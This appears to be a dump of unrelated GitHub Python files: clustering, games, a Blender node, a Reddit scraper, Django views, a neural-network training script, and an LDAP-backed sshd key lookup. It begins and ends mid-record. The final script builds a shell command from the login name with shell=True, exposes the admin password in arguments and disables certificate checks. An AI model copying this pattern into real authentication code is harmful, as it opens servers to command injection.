:-1] = D_small\n D_[-1, :-1] = scores[i]\n D_[:-1, -1] = scores[i]\n D_[-1, -1] = main_mean\n D_ = np.exp(-D_ / (2*np.std(D_)))\n D_ = D_.max() - D_\n #plt.imshow(D_)\n #plt.show()\n labels_true = np.array([len(representatives[0]) * [i] for i in range(4)]).flatten()\n ans = get_label_spectral(D_, 4, labels_true)\n predictions.append(ans)\n #plot_scores(scores[i], ans, labels[i])\n #plot_embedding(embedding, 4, ans+1, labels[i])\n\n return D_small, predictions\n\n\ndef purify_frontiers(labels, frontiers):\n N = len(labels)\n new_frontiers = [[] for i in range(N)]\n for i in range(np.max(labels)+1):\n 
cluster_indices = np.argwhere(labels == i).flatten()\n for j in cluster_indices:\n for x in frontiers[j]:\n if x[0] in cluster_indices:\n new_frontiers[j].append(x[1:])\n return new_frontiers\n\n\ndef representatives_selector(D, num_representatives, cluster_sizes, n_iters=10):\n \"\"\"\n Try many random selections of representatives and validate them on the remainder of the reads.\n :param D: distance matrix\n :param num_representatives: the number of demanded representatives\n :param cluster_sizes: a list of per-cluster sizes\n :param n_iters: the number of random selections performed\n :return: the best selection of representatives\n \"\"\"\n N = len(cluster_sizes)\n for iteration in range(n_iters):\n candidates_idx = np.array([\n np.random.choice(cluster_sizes[i], num_representatives) for i in range(N)\n ]).flatten()\n scores = []\n for i in range(len(D)):\n if i not in candidates_idx:\n scores.append(D[i, candidates_idx])\n D_ = D[candidates_idx,:][:, candidates_idx]\n _, pred = validate(D_, candidates_idx, scores)\n\n\ndef correctness(pred, labels):\n pred = np.array(pred)\n labels = np.array(labels)\n return np.sum(pred == labels)/len(pred)*100\n\n\ndef correctness_summary(pred, labels):\n assert len(pred) == len(labels)\n pred = np.array(pred)\n complete_accuracy = correctness(pred, labels)\n pred_, labels_ = [], []\n for i in range(len(pred)):\n if pred[i] != -1:\n pred_.append(pred[i])\n labels_.append(labels[i])\n labeled_accuracy = correctness(pred_, labels_)\n labeled_percentage = (len(pred_)/len(pred))*100\n print('{:20}:{:6} %'.format('Accuracy (complete)', complete_accuracy))\n print('{:20}:{:6} %'.format('Accuracy (labeled)', labeled_accuracy))\n print('{:20}:{:6} %'.format('Percentage of labeled', labeled_percentage))\n return complete_accuracy, labeled_accuracy, labeled_percentage\n\n\nfile = 'matrix_2000'\ncluster_sizes = [500]*4\nlabels_true = np.array([i for i in range(len(cluster_sizes)) for j in range(cluster_sizes[i])])\nreads, D, key_to_index, index_to_key, reads, frontiers = load_training_data(file)\nrepresentatives, labels_pred, affinity = get_representants(D, labels_true, 4, 20)\nlabels_pred = depermutate_lables(labels_true, labels_pred)\nfrontiers = purify_frontiers(labels_pred, frontiers)\nmake_validation_input('matrix_2000', representatives)\n\n#X, labels, scores = get_scores(file+'_cluster.out')\n#for i in range(len(labels)):\n# if labels[i] == 2:\n# labels[i] = 3\n# elif labels[i] == 3:\n# labels[i] = 2\n\n#D_, predictions = validate(D, representatives, scores)\n#print(correctness(predictions, labels))\n","repo_name":"Gogis0/barcluster","sub_path":"linear_aligner.py","file_name":"linear_aligner.py","file_ext":"py","file_size_in_byte":12626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
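The barcluster pipeline above repeatedly turns a DTW distance matrix into an affinity via np.exp(-D/(2*D.std())) before spectral clustering. A minimal self-contained sketch of that step on a toy block-structured matrix (the toy data and sizes are mine); the original additionally flips the kernel with distances.max() - distances, which is omitted here, since the plain Gaussian kernel is the textbook input for SpectralClustering's precomputed affinity:

import numpy as np
from sklearn.cluster import SpectralClustering

# Toy 2-cluster distance matrix: small distances within blocks, large across.
rng = np.random.default_rng(0)
D = np.full((20, 20), 10.0) + rng.random((20, 20))
D[:10, :10] = rng.random((10, 10))
D[10:, 10:] = rng.random((10, 10))
D = (D + D.T) / 2          # symmetrize
np.fill_diagonal(D, 0.0)

# Same transform as the script: Gaussian kernel on the distances.
affinity = np.exp(-D / (2 * D.std()))

labels = SpectralClustering(n_clusters=2,
                            affinity='precomputed',
                            assign_labels='discretize',
                            random_state=0).fit_predict(affinity)
print(labels)  # expect the first 10 and last 10 indices to form two groups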
+{"seq_id":"7334789362","text":"import random\n\n__author__ = 'm'\n########################\n# The \"Anagrams 2.0\" game #\n########################\n\nprint(\"\"\"\n########################\n# The \"Anagrams 2.0\" game #\n########################\n\"\"\")\n\nprint(\"\"\"\nRules of the game:\n1. You will be shown a set of letters\n2. From this set of letters you must assemble a word\n3. You can ask for a hint:\n 1) To do so, enter '50'\n 2) If you use the hint, you get half as many points\n4. Scoring rules:\n 1) If you guess the word on the first try, you get 100 points\n 2) On the second - 80\n 3) On the third - 60, and so on\n5. To quit without answering, enter an empty line\n\"\"\")\n\nWORDS = (\n \"roadtrain\",\n \"locomotive\",\n \"programming\",\n \"algorithm\",\n \"funfair\"\n)\n\nword = random.choice(WORDS)\ncorrect = word\njumble = \"\"\nscore = 100\nuse_prompt = False\n\nwhile word:\n position = random.randrange(len(word))\n jumble += word[position]\n word = word[:position] + word[position + 1:]\n\nprint(\"Guess the word\\n\" + jumble)\n\nguess = input(\"\\nEnter your answer: \")\nwhile guess != correct and guess != \"\":\n if (guess == \"50\"):\n if (use_prompt):\n print(\"You have already used the hint once.\")\n else:\n print(\"You used the hint: \" + correct[:len(correct)//2])\n print(\"Your score has been halved\")\n score //= 2\n use_prompt = True\n else:\n print(\"Wrong answer. \")\n if score - 10 > 0:\n print(\"You lost 10 points.\")\n score -= 10\n else:\n print(\"You have nothing left to lose!\")\n score = 0\n guess = input(\"Try again: \")\n\nif guess == correct:\n print(\"Congratulations! You guessed the word and earned \" + str(score) + \" points.\")\n\nif guess == \"\":\n print(\"And the word was a simple one: \" + correct, end=\".\\n\")\n","repo_name":"MaxMoto1702/study-python","sub_path":"ch4/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"37777479140","text":"import bpy\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom bpy.props import BoolProperty\n\n# pylint: disable=w0613\n# pylint: disable=c0111\n# pylint: disable=c0103\n\n\nclass SvCollectionPicker(SverchCustomTreeNode, bpy.types.Node):\n\n \"\"\"\n Triggers: SvCollectionPicker\n Tooltip: Pick the objects contained in a Blender collection\n \"\"\"\n\n bl_idname = 'SvCollectionPicker'\n bl_label = 'Collection Picker'\n bl_icon = 'GROUP'\n is_scene_dependent = True\n is_animation_dependent = True\n\n def find_collections(self, object):\n return True\n\n collection: bpy.props.PointerProperty(\n name=\"collection name\", poll=find_collections, type=bpy.types.Collection, update=updateNode)\n\n sort_object: BoolProperty(\n name=\"Sort Objects\", description=\"Sort objects by name\",\n default=True, update=updateNode)\n\n show_all_objects: bpy.props.BoolProperty(\n name=\"Show All Objects\", description=\"Show all objects in the hierarchy of collections\",\n default=False, update=updateNode)\n\n show_only_visible: bpy.props.BoolProperty(\n name=\"Show Only Visible\", description=\"Show only the visible objects\",\n default=False, update=updateNode)\n\n def sv_init(self, context):\n self.outputs.new(\"SvObjectSocket\", \"Objects\")\n\n def sv_draw_buttons(self, context, layout):\n col = layout.column()\n col.prop_search(self, 'collection', bpy.data, 'collections', text='', icon='GROUP')\n layout.prop(self, \"show_all_objects\")\n layout.prop(self, \"show_only_visible\")\n layout.prop(self, \"sort_object\")\n\n def process(self):\n\n found_objects = []\n if self.collection:\n if self.show_all_objects:\n found_objects = bpy.data.collections[self.collection.name].all_objects[:] or []\n else:\n found_objects = self.collection.objects[:] or []\n\n if self.show_only_visible:\n found_objects = [obj for obj in found_objects if obj.visible_get()]\n\n if self.sort_object:\n items = [(obj.name, obj) for obj in found_objects]\n items = sorted(items, key=lambda x: x[0], reverse=False)\n found_objects = [item[1] for item in items]\n\n
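The anagram game above builds the jumble by repeatedly extracting one random character, which amounts to a uniform shuffle of the letters; random.sample expresses the same thing in one line. A minimal sketch (the jumble function name is mine):

import random

def jumble(word):
    # random.sample returns all the letters in a random order, i.e. a shuffle
    return ''.join(random.sample(word, len(word)))

print(jumble("programming"))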
self.outputs['Objects'].sv_set(found_objects)\n\nclasses = [SvCollectionPicker]\nregister, unregister = bpy.utils.register_classes_factory(classes)\n\nif __name__ == '__main__':\n register()\n","repo_name":"nortikin/sverchok","sub_path":"nodes/scene/collection_picker_mk1.py","file_name":"collection_picker_mk1.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"8057379917","text":"import os\nimport praw\nimport csv\nfrom typing import List, Dict, Tuple\nimport argparse\nfrom .sentiment_analysis import analyze_sentiment\nfrom tqdm import tqdm\n\ndef create_reddit_instance():\n \"\"\"\n Create a Reddit API instance using environment variables for authentication.\n\n :return: A Reddit API instance.\n \"\"\"\n return praw.Reddit(\n client_id=os.environ[\"REDDIT_CLIENT_ID\"],\n client_secret=os.environ[\"REDDIT_CLIENT_SECRET\"],\n user_agent=\"reddit-scraper\",\n # username=os.environ[\"REDDIT_USERNAME\"],\n # password=os.environ[\"REDDIT_PASSWORD\"],\n )\n\ndef scrape_posts(reddit, subreddit_name: str, num_posts: int) -> List[Dict]:\n \"\"\"\n Scrape posts from a subreddit using the Reddit API.\n\n :param reddit: A Reddit API instance.\n :param subreddit_name: The name of the subreddit to scrape.\n :param num_posts: The number of posts to scrape.\n :return: A list of dictionaries containing post data.\n \"\"\"\n print(\"Scraping posts...\")\n subreddit = reddit.subreddit(subreddit_name)\n posts_data = []\n\n for post in tqdm(subreddit.hot(limit=num_posts), total=num_posts):\n post_data = {\n \"post_title\": post.title,\n \"post_id\": post.id,\n \"num_upvotes\": post.score,\n \"tags\": post.link_flair_text,\n \"post_content\": post.selftext,\n \"post_sentiment\": analyze_sentiment(post.selftext),\n }\n posts_data.append(post_data)\n\n return posts_data\n\ndef scrape_comments(reddit, post_ids: List[str], num_comments: int) -> List[Dict]:\n \"\"\"\n Scrape comments from a list of Reddit posts.\n\n :param reddit: A Reddit API instance.\n :param post_ids: A list of post IDs to scrape comments from.\n :param num_comments: The number of comments to scrape per post.\n :return: A list of dictionaries containing comment data.\n \"\"\"\n print(\"Scraping comments...\")\n comments_data = []\n\n for post_id in tqdm(post_ids, desc=\"Posts\"):\n post = reddit.submission(id=post_id)\n\n post.comments.replace_more(limit=None)\n for comment in tqdm(post.comments.list()[:num_comments], total=num_comments, desc=\"Comments\"):\n comment_data = {\n \"post_title\": post.title,\n \"post_id\": post_id,\n \"commenter_name\": comment.author.name,\n \"comment_body\": comment.body,\n \"num_upvotes\": comment.score,\n \"comment_sentiment\": analyze_sentiment(comment.body),\n }\n comments_data.append(comment_data)\n\n return comments_data\n\ndef export_to_csv(data: List[Dict], filename: str):\n \"\"\"\n Export a list of dictionaries to a CSV file.\n\n :param data: A list of dictionaries containing data to export.\n :param filename: The name of the CSV file to create.\n \"\"\"\n print(f\"Exporting data to {filename}...\")\n with open(filename, \"w\", newline=\"\", encoding=\"utf-8\") as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=data[0].keys())\n writer.writeheader()\n for row in data:\n writer.writerow(row)\n\ndef parse_args() -> Tuple[str, int, int]:\n \"\"\"\n Parse command-line arguments.\n\n :return: A tuple containing the subreddit name, number of posts, and number of comments.\n \"\"\"\n parser = 
argparse.ArgumentParser(description=\"Reddit post and comment scraper.\")\n parser.add_argument(\"subreddit\", type=str, help=\"Subreddit name\")\n parser.add_argument(\"num_posts\", type=int, help=\"Number of posts to scrape\")\n parser.add_argument(\"num_comments\", type=int, help=\"Number of comments to scrape\")\n args = parser.parse_args()\n \n return args.subreddit, args.num_posts, args.num_comments\n\ndef gather_data(reddit, subreddit: str, num_posts: int, num_comments: int) -> Tuple[List[Dict], List[Dict]]:\n \"\"\"\n Gather post and comment data from a subreddit.\n\n :param reddit: A Reddit API instance.\n :param subreddit: The subreddit name to scrape.\n :param num_posts: The number of posts to scrape.\n :param num_comments: The number of comments to scrape per post.\n :return: A tuple containing lists of post and comment data dictionaries.\n \"\"\"\n posts = scrape_posts(reddit, subreddit, num_posts)\n comments = scrape_comments(reddit, [post[\"post_id\"] for post in posts], num_comments)\n return posts, comments\n\ndef export_data(posts: List[Dict], comments: List[Dict]):\n \"\"\"\n Export post and comment data to separate CSV files.\n\n :param posts: A list of dictionaries containing post data.\n :param comments: A list of dictionaries containing comment data.\n \"\"\"\n export_to_csv(posts, \"posts.csv\")\n export_to_csv(comments, \"comments.csv\")\n\ndef main():\n \"\"\"\n Main function for the Reddit post and comment scraper script.\n \"\"\"\n subreddit, num_posts, num_comments = parse_args()\n reddit = create_reddit_instance()\n posts, comments = gather_data(reddit, subreddit, num_posts, num_comments)\n export_data(posts, comments)\n print(\"Done.\")\n\ndef scrape_reddit(subreddit, num_posts, num_comments):\n reddit = create_reddit_instance()\n posts, comments = gather_data(reddit, subreddit, num_posts, num_comments)\n export_data(posts, comments)\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TheAcademicsFieldGuideToWritingCode/Reddit-Scraper","sub_path":"academics_reddit_scraper/academics_reddit_scraper.py","file_name":"academics_reddit_scraper.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31910110315","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\n\ninstall_requires = [\n 'requests',\n]\n\n\ntests_requires = [\n 'responses',\n]\n\n\nsetup(\n name='python-freeipa',\n version='0.2.0',\n author='OpenNode Team',\n author_email='info@opennodecloud.com',\n url='http://waldur.com',\n description='Lightweight FreeIPA client',\n long_description=open('README.rst').read(),\n install_requires=install_requires,\n extras_require={\n 'tests': tests_requires,\n },\n package_dir={'': 'src'},\n packages=find_packages('src', exclude=['*.tests', '*.tests.*', 'tests.*', 'tests']),\n test_suite='python_freeipa.tests.suite',\n classifiers=(\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: System :: Systems Administration :: Authentication/Directory'\n 
)\n)\n","repo_name":"Epictek/python-freeipa","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"21168585114","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nfrom .models import Book\r\nfrom django.template.defaulttags import register\r\n\r\n@register.filter\r\ndef get_range(value):\r\n return range(value)\r\n\r\n@register.filter\r\ndef get_url(value):\r\n d = value.split(\"/\")\r\n dlink = \"https://drive.google.com/uc?id=\" + d[-2] + \"&export=download\"\r\n return dlink\r\n# Create your views here.\r\n\r\ndef main(request):\r\n books = Book.objects.all()\r\n year2 = ['تشريح رأس و عنق', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس سلوكي\",\"تشريح أطراف\", \"علم الجنين\", \"النسج\"]\r\n year3 = ['تشريح', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس\",\"انكليزي\"]\r\n year4 = ['تشريح', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس\",\"انكليزي\"]\r\n year5 = ['تشريح', 'كيمياء حيوية', \"بيولوجيا جزيئية\",\"علم نفس\",\"انكليزي\"]\r\n year6 = []\r\n context = {\r\n 'books':books,\r\n 'year2':year2,\r\n 'year3':year3,\r\n 'year4':year4,\r\n 'year5':year5,\r\n 'year6':year6,\r\n }\r\n return render(request, 'main.html', context)\r\n\r\ndef lectures(request, year, subject):\r\n lecture = Book.objects.all().filter(year=year, subject=subject)\r\n context = {\r\n 'lectures': lecture,\r\n 'subject':subject,\r\n }\r\n return render(request, 'lectures.html', context)\r\n\r\n","repo_name":"mustafamordaa1/RBCs","sub_path":"archive/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2328562235","text":"# Write_a_function\n# Created by JKChang\n# 14/08/2018, 10:58\n# Tag:\n# Description: https://www.hackerrank.com/challenges/write-a-function/problem\n\n# In the Gregorian calendar three criteria must be taken into account to identify leap years:\n# The year can be evenly divided by 4, is a leap year, unless:\n# The year can be evenly divided by 100, it is NOT a leap year, unless:\n# The year is also evenly divisible by 400. 
Then it is a leap year.\n\n\ndef is_leap(year):\n leap = False\n if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\n leap = True\n\n return leap\n\n\nyear = int(input())\nprint(is_leap(year))\n","repo_name":"JKChang2015/HackerRank","sub_path":"HackerP/introduction/Write_a_function.py","file_name":"Write_a_function.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19656646462","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torch.nn.functional as F\nimport scipy.io as sio\nimport numpy as np\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nimport platform\nfrom argparse import ArgumentParser\nimport csdata_fast\n\nparser = ArgumentParser(description='MADUN')\nparser.add_argument('--start_epoch', type=int, default=0, help='epoch number of start training')\nparser.add_argument('--end_epoch', type=int, default=400, help='epoch number of end training')\nparser.add_argument('--finetune', type=int, default=10, help='epoch number of finetuning')\nparser.add_argument('--layer_num', type=int, default=25, help='stage number of MADUN')\nparser.add_argument('--learning_rate', type=float, default=1e-4, help='learning rate')\nparser.add_argument('--cs_ratio', type=int, default=30, help='from {10, 25, 30, 40, 50}')\nparser.add_argument('--gpu_list', type=str, default='0', help='gpu index')\nparser.add_argument('--patch_size', type=int, default=33)\nparser.add_argument('--batch_size', type=int, default=64)\nparser.add_argument('--rgb_range', type=int, default=1, help='value range 1 or 255')\nparser.add_argument('--n_channels', type=int, default=1, help='1 for gray, 3 for color')\nparser.add_argument('--channels', type=int, default=32, help='feature number')\nparser.add_argument('--matrix_dir', type=str, default='sampling_matrix', help='sampling matrix directory')\nparser.add_argument('--model_dir', type=str, default='model', help='trained or pre-trained model directory')\nparser.add_argument('--data_dir', type=str, default='data', help='training data directory')\nparser.add_argument('--train_name', type=str, default='train400', help='name of train set')\nparser.add_argument('--ext', type=str, default='.png', help='training data directory')\nparser.add_argument('--log_dir', type=str, default='log', help='log directory')\nparser.add_argument('--algo_name', type=str, default='MADUN', help='log directory')\nparser.add_argument('--data_copy', type=int, default=200, help='training data directory')\n\nargs = parser.parse_args()\n\nstart_epoch = args.start_epoch\nend_epoch = args.end_epoch\nlearning_rate = args.learning_rate\nlayer_num = args.layer_num\ncs_ratio = args.cs_ratio\ngpu_list = args.gpu_list\nchannels = args.channels\nfinetune = args.finetune\nbatch_size = args.batch_size\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu_list\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nratio_dict = {10:0, 25:1, 30:2, 40:3, 50:4}\nn_input_dict = {1: 10, 4: 43, 10: 109, 25: 272, 30: 327, 40: 436, 50: 545}\n\nn_input = n_input_dict[cs_ratio]\nn_output = 1089\n\n# Load CS Sampling Matrix: phi\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 10)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input10 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 25)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input25 = Phi_data['phi']\n\nPhi_data_Name = 
'./%s/phi_0_%d_1089.mat' % (args.matrix_dir, 30)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input30 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 40)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input40 = Phi_data['phi']\n\nPhi_data_Name = './%s/phi_0_%d_1089.mat' % (args.matrix_dir, 50)\nPhi_data = sio.loadmat(Phi_data_Name)\nPhi_input50 = Phi_data['phi']\n\n# Initialization model\ndef PhiTPhi_fun(x, PhiW, PhiTW):\n temp = F.conv2d(x, PhiW, padding=0,stride=33, bias=None)\n temp = F.conv2d(temp, PhiTW, padding=0, bias=None)\n temp = torch.nn.PixelShuffle(33)(temp)\n return temp\n\n# Define ConvLSTM\nclass ConvLSTM(nn.Module):\n def __init__(self, inp_dim, oup_dim, kernel):\n \n super().__init__()\n pad_x = 1\n self.conv_xf = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n self.conv_xi = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n self.conv_xo = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n self.conv_xj = nn.Conv2d(inp_dim, oup_dim, kernel, padding=pad_x)\n\n pad_h = 1\n self.conv_hf = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n self.conv_hi = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n self.conv_ho = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n self.conv_hj = nn.Conv2d(oup_dim, oup_dim, kernel, padding=pad_h)\n\n def forward(self, x, h, c): \n \n if h is None and c is None:\n i = F.sigmoid(self.conv_xi(x))\n o = F.sigmoid(self.conv_xo(x))\n j = F.tanh(self.conv_xj(x))\n c = i * j\n h = o * c\n else:\n f = F.sigmoid(self.conv_xf(x) + self.conv_hf(h))\n i = F.sigmoid(self.conv_xi(x) + self.conv_hi(h))\n o = F.sigmoid(self.conv_xo(x) + self.conv_ho(h))\n j = F.tanh(self.conv_xj(x) + self.conv_hj(h))\n c = f * c + i * j\n h = o * F.tanh(c)\n \n return h, h, c\n\n# Define RB\nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, bias=True):\n\n super(ResidualBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size, padding=(kernel_size//2), bias=bias)\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size, padding=(kernel_size//2), bias=bias)\n self.act1 = nn.ReLU(inplace=True)\n\n def forward(self, x):\n input = x\n x = self.conv1(x)\n x = self.act1(x)\n x = self.conv2(x)\n res = x\n x = res + input\n return x\n\n# Define MADUN Stage\nclass BasicBlock(torch.nn.Module):\n def __init__(self):\n \n super(BasicBlock, self).__init__()\n self.lambda_step = nn.Parameter(torch.Tensor([0.5]))\n self.conv_D = nn.Parameter(init.xavier_normal_(torch.Tensor(channels, channels+1, 3, 3)))\n self.RB1 = ResidualBlock(channels, channels, 3, bias=True)\n self.RB2 = ResidualBlock(channels, channels, 3, bias=True)\n self.conv_G = nn.Parameter(init.xavier_normal_(torch.Tensor(1, channels, 3, 3)))\n self.ConvLSTM = ConvLSTM(channels, channels, 3)\n \n def forward(self, x, z, PhiWeight, PhiTWeight, PhiTb, h, c):\n \n x = x - self.lambda_step * PhiTPhi_fun(x, PhiWeight, PhiTWeight)\n x_input = x + self.lambda_step * PhiTb\n x_a = torch.cat([x_input, z], 1)\n x_D = F.conv2d(x_a, self.conv_D, padding=1)\n x = self.RB1(x_D)\n x, h, c = self.ConvLSTM(x, h, c)\n x_backward = self.RB2(x)\n x_G = F.conv2d(x_backward, self.conv_G, padding=1)\n x_pred = x_input + x_G\n\n return x_pred, x_backward, h, c\n\n# Define MADUN\nclass MADUN(torch.nn.Module):\n def __init__(self, LayerNo):\n super(MADUN, self).__init__()\n onelayer = []\n self.LayerNo = LayerNo\n\n for i in range(LayerNo):\n onelayer.append(BasicBlock())\n\n self.fcs = nn.ModuleList(onelayer)\n self.fe = 
nn.Conv2d(1, channels, 3, padding=1, bias=True)\n\n def forward(self, Phix, Phi):\n\n PhiWeight = Phi.contiguous().view(n_input, 1, 33, 33)\n PhiTWeight = Phi.t().contiguous().view(n_output, n_input, 1, 1)\n PhiTb = F.conv2d(Phix, PhiTWeight, padding=0, bias=None) # 64*1089*3*3 \n PhiTb = torch.nn.PixelShuffle(33)(PhiTb)\n x = PhiTb\n [h, c] = [None, None]\n z = self.fe(x)\n\n for i in range(self.LayerNo):\n x, z, h, c = self.fcs[i](x, z, PhiWeight, PhiTWeight, PhiTb, h, c)\n \n x_final = x\n\n return x_final\n\nmodel = MADUN(layer_num)\nmodel = nn.DataParallel(model)\nmodel = model.to(device)\n\nprint_flag = 1 # print parameter number\n\nif print_flag:\n num_count = 0\n num_params = 0\n for para in model.parameters():\n num_count += 1\n num_params += para.numel()\n print('Layer %d' % num_count)\n print(para.size())\n print(\"total para num: %d\" % num_params)\n\ntraining_data = csdata_fast.SlowDataset(args)\n\nif (platform.system() ==\"Windows\"):\n rand_loader = DataLoader(dataset=training_data, batch_size=batch_size, num_workers=0,\n shuffle=True)\nelse:\n rand_loader = DataLoader(dataset=training_data, batch_size=batch_size, num_workers=8,\n shuffle=True)\n\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\nmodel_dir = \"./%s/CS_%s_channels_%d_layer_%d_ratio_%d\" % (args.model_dir, args.algo_name, channels, layer_num, cs_ratio)\nlog_file_name = \"./%s/Log_CS_%s_channels_%d_layer_%d_ratio_%d.txt\" % (args.log_dir, args.algo_name, channels, layer_num, cs_ratio)\n\nif not os.path.exists(model_dir):\n os.makedirs(model_dir)\nif not os.path.exists(args.log_dir):\n os.makedirs(args.log_dir)\n\nif start_epoch > 0:\n pre_model_dir = model_dir\n model.load_state_dict(torch.load('./%s/net_params_%d.pkl' % (pre_model_dir, start_epoch)))\n\nPhi10 = torch.from_numpy(Phi_input10).type(torch.FloatTensor).to(device)\nPhi25 = torch.from_numpy(Phi_input25).type(torch.FloatTensor).to(device)\nPhi30 = torch.from_numpy(Phi_input30).type(torch.FloatTensor).to(device)\nPhi40 = torch.from_numpy(Phi_input40).type(torch.FloatTensor).to(device)\nPhi50 = torch.from_numpy(Phi_input50).type(torch.FloatTensor).to(device)\nPhi_matrix = {0: Phi10, 1: Phi25, 2: Phi30, 3: Phi40, 4: Phi50}\n\nmedia_epoch = end_epoch\nif finetune > 0:\n end_epoch = end_epoch + finetune\n patch_size1 = 99\n \n# Training loop\nfor epoch_i in range(start_epoch + 1, end_epoch + 1):\n\n if epoch_i > media_epoch:\n args.patch_size = patch_size1\n \n for data in rand_loader:\n batch_x = data\n batch_x = batch_x.to(device)\n batch_x = batch_x.view(-1, 1, args.patch_size, args.patch_size)\n \n Phi = Phi_matrix[ratio_dict[cs_ratio]]\n PhiWeight = Phi.contiguous().view(n_input, 1, 33, 33)\n Phix = F.conv2d(batch_x, PhiWeight, padding=0,stride=33, bias=None)\n\n x_output = model(Phix, Phi)\n\n # Compute and print loss\n loss_all = nn.L1Loss()(x_output, batch_x)\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss_all.backward()\n optimizer.step()\n\n output_data = \"[%02d/%02d] Total Loss: %.4f\\n\" % (epoch_i, end_epoch, loss_all.item())\n print(output_data)\n\n output_file = open(log_file_name, 'a')\n output_file.write(output_data)\n output_file.close()\n\n if epoch_i % 10 == 0 and epoch_i <= 400:\n torch.save(model.state_dict(), \"./%s/net_params_%d.pkl\" % (model_dir, epoch_i)) # save only the parameters\n elif epoch_i > 400:\n torch.save(model.state_dict(), \"./%s/net_params_%d.pkl\" % (model_dir, epoch_i)) # save only the 
parameters\n","repo_name":"songjiechong/MADUN-ACMMM2021","sub_path":"Train_CS_MADUN.py","file_name":"Train_CS_MADUN.py","file_ext":"py","file_size_in_byte":10727,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"54"} +{"seq_id":"27421170130","text":"fname = input('Enter file name ')\r\n\r\ntry:\r\n fh = open(fname)\r\nexcept:\r\n print('No such file!')\r\n quit()\r\n\r\nlst = list()\r\nlst2 = list()\r\ndc = dict()\r\n\r\n\r\nfor line in fh:\r\n if not line.startswith('From') or line.startswith('From:'): continue\r\n lst = line.split()\r\n lst2 = lst[5].split(':')\r\n dc[lst2[0]] = dc.get(lst2[0],0) + 1\r\n\r\n# print(dc)\r\n\r\n# sorting the dictionary by hour\r\n\r\n# lst3 = list()\r\n\r\nfor key,value in sorted(dc.items()):\r\n print(key,value)\r\n","repo_name":"Shridhar2025/Python_for_everybody_my_codes","sub_path":"09_tuple.py","file_name":"09_tuple.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25729969822","text":"#!/usr/bin/env python\n\"\"\"\nTakes in 1 argument provided by sshd: {username}.\nldap_authenticator.py {user}\nPrints the authorized ssh keys that can be used to access the cluster for each user.\n\"\"\"\n\nimport subprocess\nimport sys\n\nwith open(\"/efs/opt/hostname\") as fp:\n host = fp.read().rstrip()\n\nwith open(\"/efs/opt/ltpsecret\") as fp:\n user = \"'(&(objectClass=posixAccount)(uid=%s))'\" % (sys.argv[1])\n s = fp.read().rstrip()\n call = subprocess.check_output(\" \".join(['export', 'LDAPTLS_REQCERT=allow', '&&' ,'ldapsearch','-x','-H','ldaps://' + host + \":389\",'-D',\n 'cn=admin,ou=admin,dc=pcprod,dc=com', '-b', 'dc=pcprod,dc=com',\n '-s', 'sub', user, '-w', s, \"-o\", \"ldif-wrap=no\"]), shell=True, executable=\"/bin/bash\")\n\nprint(\"\\n\".join([ x.split(\": \")[1] for x in call.splitlines() if \"sshPublicKey\" in 